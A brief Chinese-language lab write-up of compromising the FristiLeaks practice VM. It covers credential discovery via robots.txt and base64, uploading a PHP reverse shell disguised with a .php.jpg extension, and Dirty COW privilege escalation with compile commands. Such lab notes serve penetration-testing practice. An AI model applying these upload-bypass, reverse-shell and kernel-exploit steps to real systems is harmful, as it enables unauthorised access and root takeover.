靶机:fristileaks 测试机:kali(IP:192.168.186.128),win10
主页面 有robots.txt 一定要看 发现类似用户名信息
目录扫描没有什么结果,换个思路根据相关信息找到登录口/fristi/ 并且发现base64加密的信息和用户信息 Base64 解密是png图片数据导入1.png 应该是密码
用户名eezeepz,密码keKkeKKeKKeKkEKKEK登录找到上传点 利用解析漏洞使用 Kali下的 webshell修改文件内容 后缀上传 直接访问http://192.168.186.146/fristi/uploads/php-reverse-shell.php.jpg拿到shell 脏牛提权: Python开启简易web服务python -m SimpleHTTPServer 8080下载 编译运行:
gcc -pthread dirtcow.c -lcrypt -o a
脏牛提权版本